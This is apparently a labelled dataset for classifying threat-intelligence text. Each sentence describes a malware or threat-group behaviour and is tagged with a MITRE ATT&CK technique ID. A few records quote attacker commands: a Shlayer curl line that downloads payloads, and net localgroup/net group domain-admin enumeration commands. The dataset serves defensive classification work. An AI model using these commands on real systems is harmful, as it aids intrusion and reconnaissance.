{"text1":"TeamTNT has used batch scripts to download tools and execute cryptocurrency miners.","labels":"['T1059.003']"}
|
|
{"text1":"The C# implementation of the CharmPower command execution module can use \"cmd\".","labels":"['T1059.003']"}
|
|
{"text1":"The Maze encryption process has used batch scripts with various commands.","labels":"['T1059.003']"}
|
|
{"text1":"Threat Group-1314 actors spawned shells on remote systems on a victim network to execute commands.","labels":"['T1059.003']"}
|
|
{"text1":"Threat Group-3390 has used command-line interfaces for execution.","labels":"['T1059.003']"}
|
|
{"text1":"TinyTurla has been installed using a .bat file.","labels":"['T1059.003']"}
|
|
{"text1":"TrickBot has used macros in Excel documents to download and deploy the malware on the user\u2019s machine.","labels":"['T1059.003']"}
|
|
{"text1":"Trojan.Karagany can perform reconnaissance commands on a victim machine via a cmd.exe process.","labels":"['T1059.003']"}
|
|
{"text1":"Tropic Trooper has used Windows command scripts.","labels":"['T1059.003']"}
|
|
{"text1":"Turian can create a remote shell and execute commands using cmd.","labels":"['T1059.003']"}
|
|
{"text1":"UBoatRAT can start a command shell.","labels":"['T1059.003']"}
|
|
{"text1":"UNC2452 used \"cmd.exe\" to execute commands on remote machines.","labels":"['T1059.003']"}
|
|
{"text1":"UPPERCUT uses cmd.exe to execute commands on the victim\u2019s machine.","labels":"['T1059.003']"}
|
|
{"text1":"USBferry can execute various Windows commands.","labels":"['T1059.003']"}
|
|
{"text1":"Umbreon provides access using both standard facilities like SSH and additional access using its backdoor Espeon, providing a reverse shell upon receipt of a special packet.","labels":"['T1059.003']"}
|
|
{"text1":"Volgmer can execute commands on the victim's machine.","labels":"['T1059.003']"}
|
|
{"text1":"WEBC2 can open an interactive command shell.","labels":"['T1059.003']"}
|
|
{"text1":"WarzoneRAT can use `cmd.exe` to execute malicious code.","labels":"['T1059.003']"}
|
|
{"text1":"WellMess can execute command line scripts received from C2.","labels":"['T1059.003']"}
|
|
{"text1":"Wiarp creates a backdoor through which remote attackers can open a command line interface.","labels":"['T1059.003']"}
|
|
{"text1":"XTunnel has been used to execute remote commands.","labels":"['T1059.003']"}
|
|
{"text1":"Zebrocy uses cmd.exe to execute commands on the system.","labels":"['T1059.003']"}
|
|
{"text1":"ZxShell can launch a reverse command shell.","labels":"['T1059.003']"}
|
|
{"text1":"adbupd can run a copy of cmd.exe.","labels":"['T1059.003']"}
|
|
{"text1":"ccf32 has used `cmd.exe` for archiving data and deleting files.","labels":"['T1059.003']"}
|
|
{"text1":"cmd is used to execute programs and other actions at the command-line interface.","labels":"['T1059.003']"}
|
|
{"text1":"hcdLoader provides command-line access to the compromised system.","labels":"['T1059.003']"}
|
|
{"text1":"httpclient opens cmd.exe on the victim.","labels":"['T1059.003']"}
|
|
{"text1":"jRAT has command line access.","labels":"['T1059.003']"}
|
|
{"text1":"menuPass executes commands using a command-line interface and reverse shell. The group has used a modified version of pentesting script wmiexec.vbs to execute commands. menuPass has used malicious macros embedded inside Office documents to execute files.","labels":"['T1059.003']"}
|
|
{"text1":"njRAT can launch a command shell interface for executing commands.","labels":"['T1059.003']"}
|
|
{"text1":"xCaon has a command to start an interactive shell.","labels":"['T1059.003']"}
|
|
{"text1":"zwShell can launch command-line shells.","labels":"['T1059.003']"}
|
|
{"text1":"Anchor can execute payloads via shell scripting.","labels":"['T1059.004']"}
|
|
{"text1":"Bundlore has leveraged \/bin\/sh and \/bin\/bash to execute commands on the victim machine.","labels":"['T1059.004']"}
|
|
{"text1":"CallMe has the capability to create a reverse shell on victims.","labels":"['T1059.004']"}
|
|
{"text1":"Chaos provides a reverse shell connection on 8338\/TCP, encrypted via AES.","labels":"['T1059.004', 'T1573.001']"}
|
|
{"text1":"CookieMiner has used a Unix shell script to run a series of commands targeting macOS.","labels":"['T1059.004']"}
|
|
{"text1":"Drovorub can execute arbitrary commands as root on a compromised system.","labels":"['T1059.004']"}
|
|
{"text1":"Exaramel for Linux has a command to execute a shell command on the system.","labels":"['T1059.004']"}
|
|
{"text1":"Fysbis has the ability to create and execute commands in a remote shell for CLI.","labels":"['T1059.004']"}
|
|
{"text1":"Kinsing has used Unix shell scripts to execute commands in the victim environment.","labels":"['T1059.004']"}
|
|
{"text1":"Kobalos can spawn a new pseudo-terminal and execute arbitrary commands at the command prompt.","labels":"['T1059.004']"}
|
|
{"text1":"LoudMiner used shell scripts to launch various services and to start\/stop the QEMU virtualization.","labels":"['T1059.004']"}
|
|
{"text1":"MacMa can execute supplied shell commands and uses bash scripts to perform additional actions.","labels":"['T1059.004']"}
|
|
{"text1":"NETWIRE has the ability to use \"\/bin\/bash\" and \"\/bin\/sh\" to execute commands.","labels":"['T1059.004']"}
|
|
{"text1":"OSX\/Shlayer can use bash scripts to check the macOS version, download payloads, and extract bytes from files. OSX\/Shlayer uses the command \"sh -c tail -c +1381...\" to extract bytes at an offset from a specified file. OSX\/Shlayer uses the \"curl -fsL \"$url\" >$tmp_path\" command to download malicious payloads into a temporary directory.","labels":"['T1059.004']"}
|
|
{"text1":"Penquin can execute remote commands using bash scripts.","labels":"['T1059.004']"}
|
|
{"text1":"Proton uses macOS' .command file type to script actions.","labels":"['T1059.004']"}
|
|
{"text1":"Rocke used shell scripts to run commands which would obtain persistence and execute the cryptocurrency mining malware.","labels":"['T1059.004']"}
|
|
{"text1":"Skidmap has used \"pm.sh\" to download and install its main payload.","labels":"['T1059.004']"}
|
|
{"text1":"TeamTNT has used shell scripts for execution.","labels":"['T1059.004']"}
|
|
{"text1":"XCSSET uses a shell script to execute Mach-o files and \"osacompile\" commands such as \"osacompile -x -o xcode.app main.applescript\".","labels":"['T1059.004']"}
|
|
{"text1":"APT29 has written malware variants in Visual Basic.","labels":"['T1059.005']"}
|
|
{"text1":"APT33 has used VBScript to initiate the delivery of payloads.","labels":"['T1059.005']"}
|
|
{"text1":"APT37 executes shellcode and a VBA script to decode Base64 strings.","labels":"['T1059.005']"}
|
|
{"text1":"APT38 has used VBScript to execute commands and other operational tasks.","labels":"['T1059.005']"}
|
|
{"text1":"APT39 has utilized malicious VBS scripts in malware.","labels":"['T1059.005']"}
|
|
{"text1":"Astaroth has used malicious VBS e-mail attachments for execution.","labels":"['T1059.005']"}
|
|
{"text1":"BRONZE BUTLER has used VBS and VBE scripts for execution.","labels":"['T1059.005']"}
|
|
{"text1":"BackConfig has used VBS to install its downloader component and malicious documents with VBA macro code.","labels":"['T1059.005']"}
|
|
{"text1":"Bisonal's dropper creates VBS scripts on the victim\u2019s machine.","labels":"['T1059.005']"}
|
|
{"text1":"Bumblebee can create a Visual Basic script to enable persistence.","labels":"['T1059.005']"}
|
|
{"text1":"Chaes has used VBscript to execute malicious code.","labels":"['T1059.005']"}
|
|
{"text1":"Cobalt Group has sent Word OLE compound documents with malicious obfuscated VBA macros that will run upon user execution.","labels":"['T1059.005']"}
|
|
{"text1":"Cobalt Strike can use VBA to perform execution.","labels":"['T1059.005']"}
|
|
{"text1":"Confucius has used VBScript to execute malicious code.","labels":"['T1059.005']"}
|
|
{"text1":"DanBot can use a VBA macro embedded in an Excel file to drop the payload.","labels":"['T1059.005']"}
|
|
{"text1":"Donut can generate shellcode outputs that execute via VBScript.","labels":"['T1059.005']"}
|
|
{"text1":"During C0015, the threat actors used a malicious HTA file that contained a mix of HTML and JavaScript\/VBScript code.","labels":"['T1059.005']"}
|
|
{"text1":"During Frankenstein, the threat actors used Word documents that prompted the victim to enable macros and run a Visual Basic script.","labels":"['T1059.005']"}
|
|
{"text1":"During Operation CuckooBees, the threat actors executed an encoded VBScript file using `wscript` and wrote the decoded output to a text file.","labels":"['T1059.005']"}
|
|
{"text1":"During Operation Dust Storm, the threat actors used Visual Basic scripts.","labels":"['T1059.005']"}
|
|
{"text1":"During Operation Sharpshooter, the threat actors used a VBA macro to execute a simple downloader that installed Rising Sun.","labels":"['T1059.005']"}
|
|
{"text1":"Earth Lusca used VBA scripts.","labels":"['T1059.005']"}
|
|
{"text1":"Emotet has sent Microsoft Word documents with embedded macros that will invoke scripts to download additional payloads.","labels":"['T1059.005']"}
|
|
{"text1":"FIN4 has used VBA macros to display a dialog box and collect victim credentials.","labels":"['T1059.005']"}
|
|
{"text1":"Ferocious has the ability to use Visual Basic scripts for execution.","labels":"['T1059.005']"}
|
|
{"text1":"Flagpro can execute malicious VBA macros embedded in .xlsm files.","labels":"['T1059.005']"}
|
|
{"text1":"For Operation Honeybee, the threat actors used a Visual Basic script embedded within a Word document to download an implant.","labels":"['T1059.005']"}
|
|
{"text1":"Gamaredon Group has embedded malicious macros in document templates, which executed VBScript. Gamaredon Group has also delivered Microsoft Outlook VBA projects with embedded macros.","labels":"['T1059.005']"}
|
|
{"text1":"Goopy has the ability to use a Microsoft Outlook backdoor macro to communicate with its C2.","labels":"['T1059.005', 'T1071.003']"}
|
|
{"text1":"Grandoreiro can use VBScript to execute malicious code.","labels":"['T1059.005']"}
|
|
{"text1":"Honeybee embeds a Visual Basic script within a malicious Word document as part of initial access; the script is executed when the Word document is opened.","labels":"['T1059.005']"}
|
|
{"text1":"IcedID has used obfuscated VBA string expressions.","labels":"['T1059.005']"}
|
|
{"text1":"Inception has used VBScript to execute malicious commands and payloads.","labels":"['T1059.005']"}
|
|
{"text1":"JCry has used VBS scripts.","labels":"['T1059.005']"}
|
|
{"text1":"JSS Loader can download and execute VBScript files.","labels":"['T1059.005']"}
|
|
{"text1":"Javali has used embedded VBScript to download malicious payloads from C2.","labels":"['T1059.005']"}
|
|
{"text1":"KOCTOPUS has used VBScript to call wscript to execute a PowerShell command.","labels":"['T1059.005']"}
|
|
{"text1":"Kimsuky has used Visual Basic to download malicious payloads. Kimsuky has also used malicious VBA macros within maldocs disguised as forms that trigger when a victim types any content into the lure.","labels":"['T1059.005']"}
|
|
{"text1":"Koadic performs most of its operations using Windows Script Host (VBScript) and runs arbitrary shellcode .","labels":"['T1059.005']"}
|
|
{"text1":"Lazarus Group has used VBA and embedded macros in Word documents to execute malicious code.","labels":"['T1059.005']"}
|
|
{"text1":"Lazarus Group has used VBScript to gather information about a victim machine.","labels":"['T1059.005']"}
|
|
{"text1":"Lokibot has used VBS scripts and XLS macros for execution.","labels":"['T1059.005']"}
|
|
{"text1":"LookBack has used VBA macros in Microsoft Word attachments to drop additional files to the host.","labels":"['T1059.005']"}
|
|
{"text1":"Machete has embedded malicious macros within spearphishing attachments to download additional files.","labels":"['T1059.005']"}
|
|
{"text1":"Magic Hound malware has used VBS scripts for execution.","labels":"['T1059.005']"}
|
|
{"text1":"Melcoz can use VBS scripts to execute malicious DLLs.","labels":"['T1059.005']"}
|
|
{"text1":"Metamorfo has used VBS code on victims\u2019 systems.","labels":"['T1059.005']"}
|
|
{"text1":"MuddyWater has used VBScript files to execute its POWERSTATS payload, as well as macros.","labels":"['T1059.005']"}
|
|
{"text1":"NETWIRE has been executed through use of VBScripts.","labels":"['T1059.005']"}
|
|
{"text1":"NanHaiShu executes additional VBScript code on the victim's machine.","labels":"['T1059.005']"}
|
|
{"text1":"NanoCore uses VBS files.","labels":"['T1059.005']"}
|
|
{"text1":"OSX_OCEANLOTUS.D uses Word macros for execution.","labels":"['T1059.005']"}
|
|
{"text1":"OilRig has used VBScript macros for execution on compromised hosts.","labels":"['T1059.005']"}
|
|
{"text1":"One version of Helminth consists of VBScript scripts.","labels":"['T1059.005']"}
|
|
{"text1":"OopsIE creates and uses a VBScript as part of its persistent execution.","labels":"['T1059.005']"}
|
|
{"text1":"Operation Wocao has used a VBScript to conduct reconnaissance on targeted systems.","labels":"['T1059.005']"}
|
|
{"text1":"POWERSTATS can use VBScript (VBE) code for execution.","labels":"['T1059.005']"}
|
|
{"text1":"Patchwork used Visual Basic Scripts (VBS) on victim machines.","labels":"['T1059.005']"}
|
|
{"text1":"Pteranodon can use a malicious VBS file for execution.","labels":"['T1059.005']"}
|
|
{"text1":"QUADAGENT uses VBScripts.","labels":"['T1059.005']"}
|
|
{"text1":"REvil has used obfuscated VBA macros for execution.","labels":"['T1059.005']"}
|
|
{"text1":"Ramsay has included embedded Visual Basic scripts in malicious documents.","labels":"['T1059.005']"}
|
|
{"text1":"Rancor has used VBS scripts as well as embedded macros for execution.","labels":"['T1059.005']"}
|
|
{"text1":"Remexi uses AutoIt and VBS scripts throughout its execution process.","labels":"['T1059.005']"}
|
|
{"text1":"SUNBURST used VBScripts to initiate the execution of payloads.","labels":"['T1059.005']"}
|
|
{"text1":"Saint Bot has used `.vbs` scripts for execution.","labels":"['T1059.005']"}
|
|
{"text1":"Sibot executes commands using VBScript.","labels":"['T1059.005']"}
|
|
{"text1":"Sidewinder has used VBScript to drop and execute malware loaders.","labels":"['T1059.005']"}
|
|
{"text1":"Silence has used VBS scripts.","labels":"['T1059.005']"}
|
|
{"text1":"Smoke Loader adds a Visual Basic script in the Startup folder to deploy the payload.","labels":"['T1059.005']"}
|
|
{"text1":"StoneDrill has several VBS scripts used throughout the malware's lifecycle.","labels":"['T1059.005']"}
|
|
{"text1":"TA459 has a VBScript for execution.","labels":"['T1059.005']"}
|
|
{"text1":"TA505 has used VBS for code execution.","labels":"['T1059.005']"}
|
|
{"text1":"TYPEFRAME has used a malicious Word document for delivery with VBA macros for execution.","labels":"['T1059.005']"}
|
|
{"text1":"Transparent Tribe has crafted VBS-based malicious documents.","labels":"['T1059.005']"}
|
|
{"text1":"Turla has used VBS scripts throughout its operations.","labels":"['T1059.005']"}
|
|
{"text1":"Ursnif droppers have used VBA macros to download and execute the malware's full executable payload.","labels":"['T1059.005']"}
|
|
{"text1":"WIRTE has used VBScript in its operations.","labels":"['T1059.005']"}
|
|
{"text1":"WhisperGate can use a Visual Basic script to exclude the `C:\\` drive from Windows Defender.","labels":"['T1059.005']"}
|
|
{"text1":"Windshift has used Visual Basic 6 (VB6) payloads.","labels":"['T1059.005']"}
|
|
{"text1":"jRAT has been distributed as HTA files with VBScript.","labels":"['T1059.005']"}
|
|
{"text1":"APT29 has developed malware variants written in Python.","labels":"['T1059.006']"}
|
|
{"text1":"APT37 has used Python scripts to execute payloads.","labels":"['T1059.006']"}
|
|
{"text1":"APT39 has used a command line utility and a network scanner written in python.","labels":"['T1059.006']"}
|
|
{"text1":"BRONZE BUTLER has made use of Python-based remote access tools.","labels":"['T1059.006']"}
|
|
{"text1":"Bundlore has used Python scripts to execute payloads.","labels":"['T1059.006']"}
|
|
{"text1":"Cobalt Strike can use Python to perform execution.","labels":"['T1059.006']"}
|
|
{"text1":"CoinTicker executes a Python script to download its second stage.","labels":"['T1059.006', 'T1105']"}
|
|
{"text1":"CookieMiner has used python scripts on the user\u2019s system, as well as the Python variant of the Empire agent, EmPyre.","labels":"['T1059.006']"}
|
|
{"text1":"Dragonfly 2.0 used various types of scripting to perform operations, including Python scripts. The group was observed installing Python 2.7 on a victim.","labels":"['T1059.006']"}
|
|
{"text1":"Dragonfly has used various types of scripting to perform operations, including Python scripts. The group was observed installing Python 2.7 on a victim.","labels":"['T1059.006']"}
|
|
{"text1":"DropBook is a Python-based backdoor compiled with PyInstaller.","labels":"['T1059.006']"}
|
|
{"text1":"During Operation Wocao, threat actors' backdoors were written in Python and compiled with py2exe.","labels":"['T1059.006']"}
|
|
{"text1":"IronNetInjector can use IronPython scripts to load payloads with the help of a .NET injector.","labels":"['T1059.006']"}
|
|
{"text1":"KeyBoy uses Python scripts for installing files and performing execution.","labels":"['T1059.006']"}
|
|
{"text1":"Keydnap uses Python for scripting to execute additional commands.","labels":"['T1059.006']"}
|
|
{"text1":"Machete used multiple compiled Python scripts on the victim\u2019s system. Machete's main backdoor Machete is also written in Python.","labels":"['T1059.006']"}
|
|
{"text1":"MechaFlounder uses a Python-based payload.","labels":"['T1059.006']"}
|
|
{"text1":"MuddyWater has developed tools in Python, including Out1.","labels":"['T1059.006']"}
|
|
{"text1":"Operation Wocao's backdoors have been written in Python and compiled with py2exe.","labels":"['T1059.006']"}
|
|
{"text1":"PUNCHBUGGY has used Python scripts.","labels":"['T1059.006']"}
|
|
{"text1":"Pupy can use an add-on feature when creating payloads that allows you to create custom Python scripts (\u201cscriptlets\u201d) to perform tasks offline (without requiring a session), such as sandbox detection, adding persistence, etc.","labels":"['T1059.006']"}
|
|
{"text1":"PyDCrypt, along with its functions, is written in Python.","labels":"['T1059.006']"}
|
|
{"text1":"Pysa has used Python scripts to deploy ransomware.","labels":"['T1059.006']"}
|
|
{"text1":"Remcos uses Python scripts.","labels":"['T1059.006']"}
|
|
{"text1":"Rocke has used Python-based malware to install and spread their coinminer.","labels":"['T1059.006']"}
|
|
{"text1":"Small Sieve can use Python scripts to execute commands.","labels":"['T1059.006']"}
|
|
{"text1":"SpeakUp uses Python scripts.","labels":"['T1059.006']"}
|
|
{"text1":"TRITON was run as trilog.exe, a Py2Exe-compiled Python script that accepts a single IP address as a flag.","labels":"['T1059.006']"}
|
|
{"text1":"Turian has the ability to use Python to spawn a Unix shell.","labels":"['T1059.006']"}
|
|
{"text1":"Turla has used IronPython scripts as part of the IronNetInjector toolchain to drop payloads.","labels":"['T1059.006']"}
|
|
{"text1":"ZIRCONIUM has used Python-based implants to interact with compromised hosts.","labels":"['T1059.006']"}
|
|
{"text1":"APT32 has used JavaScript for drive-by downloads and C2 communications.","labels":"['T1059.007']"}
|
|
{"text1":"AppleSeed has the ability to use JavaScript to execute PowerShell.","labels":"['T1059.007']"}
|
|
{"text1":"Astaroth uses JavaScript to perform its core functionalities.","labels":"['T1059.007']"}
|
|
{"text1":"Bundlore can execute JavaScript by injecting it into the victim's browser.","labels":"['T1059.007']"}
|
|
{"text1":"Chaes has used a JavaScript and Node.js information stealer script that exfiltrates data using the node process.","labels":"['T1059.007']"}
|
|
{"text1":"Cobalt Group has executed JavaScript scriptlets on the victim's machine.","labels":"['T1059.007']"}
|
|
{"text1":"During C0015, the threat actors used a malicious HTA file that contained a mix of encoded HTML and JavaScript\/VBScript code.","labels":"['T1059.007']"}
|
|
{"text1":"During Operation Dust Storm, the threat actors used JavaScript code.","labels":"['T1059.007']"}
|
|
{"text1":"Earth Lusca has manipulated legitimate websites to inject malicious JavaScript code as part of their watering hole operations.","labels":"['T1059.007']"}
|
|
{"text1":"Ember Bear has used JavaScript to execute malicious code on a victim's machine.","labels":"['T1059.007']"}
|
|
{"text1":"EnvyScout can write files to disk with JavaScript using a modified version of the open-source tool FileSaver.","labels":"['T1059.007']"}
|
|
{"text1":"Evilnum has used malicious JavaScript files on the victim's machine.","labels":"['T1059.007']"}
|
|
{"text1":"FIN6 has used malicious JavaScript to steal payment card data from e-commerce sites.","labels":"['T1059.007']"}
|
|
{"text1":"Indrik Spider has used malicious JavaScript files for several components of their attack.","labels":"['T1059.007']"}
|
|
{"text1":"JSS Loader can download and execute JavaScript files.","labels":"['T1059.007']"}
|
|
{"text1":"KONNI has executed malicious JavaScript code.","labels":"['T1059.007']"}
|
|
{"text1":"LazyScripter has used JavaScript in its attacks.","labels":"['T1059.007']"}
|
|
{"text1":"Leafminer infected victims using JavaScript code.","labels":"['T1059.007']"}
|
|
{"text1":"Metamorfo includes payloads written in JavaScript.","labels":"['T1059.007']"}
|
|
{"text1":"Molerats used various implants, including those built with JS, on target machines.","labels":"['T1059.007']"}
|
|
{"text1":"MuddyWater has used JavaScript files to execute its POWERSTATS payload.","labels":"['T1059.007']"}
|
|
{"text1":"NanHaiShu executes additional JScript code on the victim's machine.","labels":"['T1059.007']"}
|
|
{"text1":"POWERSTATS can use JavaScript code for execution.","labels":"['T1059.007']"}
|
|
{"text1":"Sidewinder has used JavaScript to drop and execute malware loaders.","labels":"['T1059.007']"}
|
|
{"text1":"Silence has used JS scripts.","labels":"['T1059.007']"}
|
|
{"text1":"SpicyOmelette has the ability to execute arbitrary JavaScript code on a compromised host.","labels":"['T1059.007']"}
|
|
{"text1":"The Cobalt Strike System Profiler can use JavaScript to perform reconnaissance actions.","labels":"['T1059.007']"}
|
|
{"text1":"The QakBot web inject module can inject JavaScript into web banking pages visited by the victim.","labels":"['T1059.007']"}
|
|
{"text1":"Turla has used various JavaScript-based backdoors.","labels":"['T1059.007']"}
|
|
{"text1":"Valak can execute JavaScript containing configuration data for establishing persistence.","labels":"['T1059.007']"}
|
|
{"text1":"Xbash can execute malicious JavaScript payloads on the victim\u2019s machine.","labels":"['T1059.007']"}
|
|
{"text1":"jRAT has been distributed as HTA files with JScript.","labels":"['T1059.007']"}
|
|
{"text1":"APT28 has exploited CVE-2014-4076, CVE-2015-2387, CVE-2015-1701, CVE-2017-0263 to escalate privileges.","labels":"['T1068']"}
|
|
{"text1":"APT29 has exploited CVE-2021-36934 to escalate privileges on a compromised host.","labels":"['T1068']"}
|
|
{"text1":"APT32 has used CVE-2016-7255 to escalate privileges.","labels":"['T1068']"}
|
|
{"text1":"Carberp has exploited multiple Windows vulnerabilities (CVE-2010-2743, CVE-2010-3338, CVE-2010-4398, CVE-2008-1084) and a .NET Runtime Optimization vulnerability for privilege escalation.","labels":"['T1068']"}
|
|
{"text1":"Empire can exploit vulnerabilities such as MS16-032 and MS16-135.","labels":"['T1068']"}
|
|
{"text1":"Hildegard has used the BOtB tool which exploits CVE-2019-5736.","labels":"['T1068']"}
|
|
{"text1":"InvisiMole has exploited CVE-2007-5633 vulnerability in the speedfan.sys driver to obtain kernel mode privileges.","labels":"['T1068']"}
|
|
{"text1":"JHUHUGIT has exploited CVE-2015-1701 and CVE-2015-2387 to escalate privileges.","labels":"['T1068']"}
|
|
{"text1":"LAPSUS$ has exploited unpatched vulnerabilities on internally accessible servers including JIRA, GitLab, and Confluence for privilege escalation.","labels":"['T1068']"}
|
|
{"text1":"PLATINUM has leveraged a zero-day vulnerability to escalate privileges.","labels":"['T1068']"}
|
|
{"text1":"Pandora can use CVE-2017-15303 to bypass Windows Driver Signature Enforcement (DSE) protection and load its driver.","labels":"['T1068']"}
|
|
{"text1":"PoshC2 contains modules for local privilege escalation exploits such as CVE-2016-9192 and CVE-2016-0099.","labels":"['T1068']"}
|
|
{"text1":"Siloscape has leveraged a vulnerability in Windows containers to perform an Escape to Host.","labels":"['T1068']"}
|
|
{"text1":"Tonto Team has exploited CVE-2019-0803 and MS16-032 to escalate privileges.","labels":"['T1068']"}
|
|
{"text1":"Whitefly has used an open-source tool to exploit a known Windows privilege escalation vulnerability (CVE-2016-0051) on unpatched computers.","labels":"['T1068']"}
|
|
{"text1":"Wingbird exploits CVE-2016-4117 to allow an executable to gain escalated privileges.","labels":"['T1068']"}
|
|
{"text1":"ZIRCONIUM has exploited CVE-2017-0005 for local privilege escalation.","labels":"['T1068']"}
|
|
{"text1":"Zox has the ability to leverage local and remote exploits to escalate privileges.","labels":"['T1068']"}
|
|
{"text1":"APT29 used the \"Get-ManagementRoleAssignment\" PowerShell cmdlet to enumerate Exchange management role assignments through an Exchange Management Shell.","labels":"['T1069']"}
|
|
{"text1":"APT3 has a tool that can enumerate the permissions associated with Windows groups.","labels":"['T1069']"}
|
|
{"text1":"IcedID has the ability to identify Workgroup membership.","labels":"['T1069']"}
|
|
{"text1":"MURKYTOP has the capability to retrieve information about groups.","labels":"['T1069']"}
|
|
{"text1":"PUNCHBUGGY can gather domain and workgroup information.","labels":"['T1069']"}
|
|
{"text1":"TA505 has used TinyMet to enumerate members of privileged groups. TA505 has also run \"net group \/domain\".","labels":"['T1069']"}
|
|
{"text1":"UNC2452 used the \"Get-ManagementRoleAssignment\" PowerShell cmdlet to enumerate Exchange management role assignments through an Exchange Management Shell.","labels":"['T1069']"}
|
|
{"text1":"Chimera has used \"net localgroup administrators\" to identify accounts with local administrative rights.","labels":"['T1069.001']"}
|
|
{"text1":"Cobalt Strike can use \"net localgroup\" to list local groups on a system.","labels":"['T1069.001']"}
|
|
{"text1":"Commands such as \"net group\" and \"net localgroup\" can be used in Net to gather information about and manipulate groups.","labels":"['T1069.001']"}
|
|
{"text1":"During C0015, the threat actors used the command `net localgroup \"adminstrator\" ` to identify accounts with local administrator rights.","labels":"['T1069.001']"}
|
|
{"text1":"During Operation CuckooBees, the threat actors used the `net group` command as part of their advanced reconnaissance.","labels":"['T1069.001']"}
|
|
{"text1":"During Operation Wocao, threat actors used the command `net localgroup administrators` to list all administrators part of a local group.","labels":"['T1069.001']"}
|
|
{"text1":"Emissary has the capability to execute the command \"net localgroup administrators\".","labels":"['T1069.001']"}
|
|
{"text1":"Epic gathers information on local group names.","labels":"['T1069.001']"}
|
|
{"text1":"Flagpro has been used to execute the \"net localgroup administrators\" command on a targeted system.","labels":"['T1069.001']"}
|
|
{"text1":"Helminth has checked the local administrators group.","labels":"['T1069.001']"}
|
|
{"text1":"JPIN can obtain the permissions of the victim user.","labels":"['T1069.001']"}
|
|
{"text1":"Kazuar gathers information about local groups and members.","labels":"['T1069.001']"}
|
|
{"text1":"Kwampirs collects a list of users belonging to the local users and administrators groups with the commands \"net localgroup administrators\" and \"net localgroup users\".","labels":"['T1069.001']"}
|
|
{"text1":"OSInfo has enumerated the local administrators group.","labels":"['T1069.001']"}
|
|
{"text1":"OilRig has used \"net localgroup administrators\" to find local administrators on compromised systems.","labels":"['T1069.001']"}
|
|
{"text1":"POWRUNER may collect local group information by running \"net localgroup administrators\" or a series of other commands on a victim.","labels":"['T1069.001']"}
|
|
{"text1":"PoshC2 contains modules, such as \"Get-LocAdm\" for enumerating permission groups.","labels":"['T1069.001']"}
|
|
{"text1":"QakBot can use \"net localgroup\" to enable discovery of local groups.","labels":"['T1069.001']"}
|
|
{"text1":"Tonto Team has used the \"ShowLocalGroupDetails\" command to identify administrator, user, and guest accounts on a compromised host.","labels":"['T1069.001']"}
|
|
{"text1":"Turla has used \"net localgroup\" and \"net localgroup Administrators\" to enumerate group information, including members of the local administrators group.","labels":"['T1069.001']"}
|
|
{"text1":"admin@338 actors used the following command following exploitation of a machine with LOWBALL malware to list local groups: \"net localgroup administrator >> %temp%\\download\"","labels":"['T1069.001']"}
|
|
{"text1":"APT29 has used AdFind to enumerate domain groups.","labels":"['T1069.002']"}
|
|
{"text1":"AdFind can enumerate domain groups.","labels":"['T1069.002']"}
|
|
{"text1":"BloodHound can collect information about domain groups and members.","labels":"['T1069.002']"}
|
|
{"text1":"Cobalt Strike can identify targets by querying account groups on a domain controller.","labels":"['T1069.002']"}
|
|
{"text1":"Commands such as \"net group \/domain\" can be used in Net to gather information about and manipulate groups.","labels":"['T1069.002']"}
|
|
{"text1":"CrackMapExec can gather the user accounts within domain groups.","labels":"['T1069.002']"}
|
|
{"text1":"Dragonfly 2.0 used batch scripts to enumerate administrators and users in the domain.","labels":"['T1069.002']"}
|
|
{"text1":"During C0015, the threat actors use the command `net group \"domain admins\" \/dom` to enumerate domain groups.","labels":"['T1069.002']"}
|
|
{"text1":"Helminth has checked for the domain admin group and Exchange Trusted Subsystem groups using the commands \"net group Exchange Trusted Subsystem \/domain\" and \"net group domain admins \/domain\".","labels":"['T1069.002']"}
|
|
{"text1":"Inception has used specific malware modules to gather domain membership.","labels":"['T1069.002']"}
|
|
{"text1":"Ke3chang performs discovery of permission groups \"net group \/domain\".","labels":"['T1069.002']"}
|
|
{"text1":"Kwampirs collects a list of domain groups with the command \"net localgroup \/domain\".","labels":"['T1069.002']"}
|
|
{"text1":"LAPSUS$ has used the AD Explorer tool to enumerate groups on a victim's network.","labels":"['T1069.002']"}
|
|
{"text1":"OSInfo specifically looks for Domain Admins and power users within the domain.","labels":"['T1069.002']"}
|
|
{"text1":"REvil can identify the domain membership of a compromised host.","labels":"['T1069.002']"}
|
|
{"text1":"SoreFang can enumerate domain groups by executing \"net.exe group \/domain\".","labels":"['T1069.002']"}
|
|
{"text1":"Turla has used \"net group \"Domain Admins\" \/domain\" to identify domain administrators.","labels":"['T1069.002']"}
|
|
{"text1":"WellMess can identify domain group membership for the current user.","labels":"['T1069.002']"}
|
|
{"text1":"Wizard Spider has used \"AdFind.exe\" to collect information about Active Directory groups and accounts.","labels":"['T1069.002']"}
|
|
{"text1":"dsquery can be used to gather information on permission groups within a domain.","labels":"['T1069.002']"}
|
|
{"text1":"AADInternals can enumerate Azure AD groups.","labels":"['T1069.003']"}
|
|
{"text1":"ROADTools can enumerate Azure AD groups.","labels":"['T1069.003']"}
|
|
{"text1":"APT29 temporarily replaced legitimate utilities with their own, executed their payload, and then restored the original file.","labels":"['T1070']"}
|
|
{"text1":"APT29 used SDelete to remove artifacts from victims.","labels":"['T1070']"}
|
|
{"text1":"Bankshot deletes all artifacts associated with the malware from the infected machine.","labels":"['T1070']"}
|
|
{"text1":"Bazar's loader can delete scheduled tasks created by a previous instance of the malware.","labels":"['T1070', 'T1070.009']"}
|
|
{"text1":"BlackEnergy has removed the watermark associated with enabling the \"TESTSIGNING\" boot configuration option by removing the relevant strings in the \"user32.dll.mui\" of the system.","labels":"['T1070']"}
|
|
{"text1":"Donut can erase file references to payloads in-memory after being reflectively loaded and executed.","labels":"['T1070']"}
|
|
{"text1":"Dragonfly deleted system, security, terminal services, remote services, and audit logs from a victim.","labels":"['T1070']"}
|
|
{"text1":"EVILNUM has a function called \"DeleteLeftovers\" to remove certain artifacts of the attack.","labels":"['T1070']"}
|
|
{"text1":"Flagpro can close specific Windows Security and Internet Explorer dialog boxes to mask external connections.","labels":"['T1070']"}
|
|
{"text1":"Goopy has the ability to delete emails used for C2 once the content has been copied.","labels":"['T1070', 'T1070.008']"}
|
|
{"text1":"GrimAgent can delete previously created tasks on a compromised host.","labels":"['T1070', 'T1070.009']"}
|
|
{"text1":"HermeticWiper can disable pop-up information about folders and desktop items and delete Registry keys to hide malicious services.","labels":"['T1070']"}
|
|
{"text1":"KOCTOPUS can delete created registry keys as part of its cleanup procedure.","labels":"['T1070']"}
|
|
{"text1":"Lazarus Group has restored malicious KernelCallbackTable code to its original state after the process execution flow has been hijacked.","labels":"['T1070']"}
|
|
